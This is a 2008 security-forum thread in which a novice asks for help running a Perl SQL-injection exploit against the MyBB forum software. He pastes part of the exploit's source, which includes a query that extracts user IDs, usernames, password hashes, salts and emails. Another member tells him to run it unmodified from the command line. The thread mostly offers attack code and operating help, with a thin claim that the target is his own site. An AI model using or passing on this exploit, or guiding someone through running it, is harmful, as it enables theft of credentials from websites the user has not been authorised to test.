 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 230
 Members: 0
 Total: 230
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
I need english version for this exploit ? |
|
 Posted: Wed May 14, 2008 12:14 pm |
 |
|
| France |
| Regular user |
 |
|
| Joined: May 14, 2008 |
| Posts: 10 |
|
|
|
 |
|
 |
|
Like i said i looking for english translate for this mybb exploit or if you can make copy of good exploit.pl that u can use it.
| Code: |
http://www.milw0rm.com/exploits/3719 |
Thank you ! |
|
|
|
|
| Posted: Wed May 14, 2008 1:20 pm |
|
|
| gibbocool |
| Advanced user |
 |
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
| The script itself is in english, but the comments are not. Just run the script and im sure you'll understand it. |
|
|
|
|
|
|
|
|
| Posted: Wed May 14, 2008 2:07 pm |
|
|
| France |
| Regular user |
|
|
| Joined: May 14, 2008 |
| Posts: 10 |
|
|
|
|
|
|
|
I saw now when i made exploit.pl but still i dont know howt to set.When i run explit i don't get errors,but i don't get info from victime web site ?
Can you say me how to set this exploit .I can't give my settings because i try to hack my own forum 
Is this part off code that i need to edit ?
I'm new here and i want to test security of my website.Thank you for your time and help too.
| Code: |
if (@ARGV < 2) {&info(); exit();}
$host = $ARGV[0]; # ??????
$dir = $ARGV[1]; # ???? ? ???????
$uid = 2; # ??? ?????? ?? ????????
$uid = $ARGV[2] if $ARGV[2];
$debug = 0; # ????? ???????
$space = "char(58)"; # ??????????? ????????
#$search = "password"; # ??? ??????, ??????????...
#$search = "concat(uid,$space,password,$space,salt)"; # uid:password:salt
$search = "concat(uid,$space,username,$space,password,$space,salt,$space,email)"; # uid:username:password:salt:email
$search = $ARGV[3] if $ARGV[3];
# $presetascii - ???????? ascii-????? ??? ????? ????????? ??????
# $presetascii = "0123456789abcdef";
# $presetascii = "0123456789"
# $presetascii = "abcdefghijklmnopqrstuvwxyz"
# $presetascii = "0123456789abcdefghijklmnopqrstuvwxyz"
# $presetascii = "?????????????????????????????????");
# ????, ??? ???????? ?????? ??? ??????? ??? ????????
$i=0;
while($i<=255){
$presetascii.=chr($i);$i++;
}
###########################################################
######################### go! ###########################
###########################################################
$time=localtime;
&log ("[i] Start time $time\n");
&log ("[+] HOST \"$host\"\n");
&log ("[+] DIR \"$dir\"\n");
&log ("[+] UID \"$uid\"\n");
&log ("[+] Search \"$search\"\n");
###########################################################
###### detecting vulnerability and searching prefix #######
###########################################################
# detecting vulnerability and searching prefix
&log ("[~] Testing forum vulnerabile... ");
$q = "";
$prefix=query($q,$host,$dir);
if($prefix ne "not_find"){&log ("Yes! Forum vulnerable!\n");sleep(1);&log ("[~] Searching prefix...");sleep(1);&log (" prefix find - \"$prefix\"\n"); }
else
{
&log ("Sorry. Forum unvulnerable\n");
&footer();
exit();
}
|
|
|
|
|
|
|
|
|
|
| Posted: Thu May 15, 2008 10:24 am |
|
|
| gibbocool |
| Advanced user |
|
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
Don't edit the code.
Run the script from a command line such as: "perl script.pl"
It will then prompt you with the required input. |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
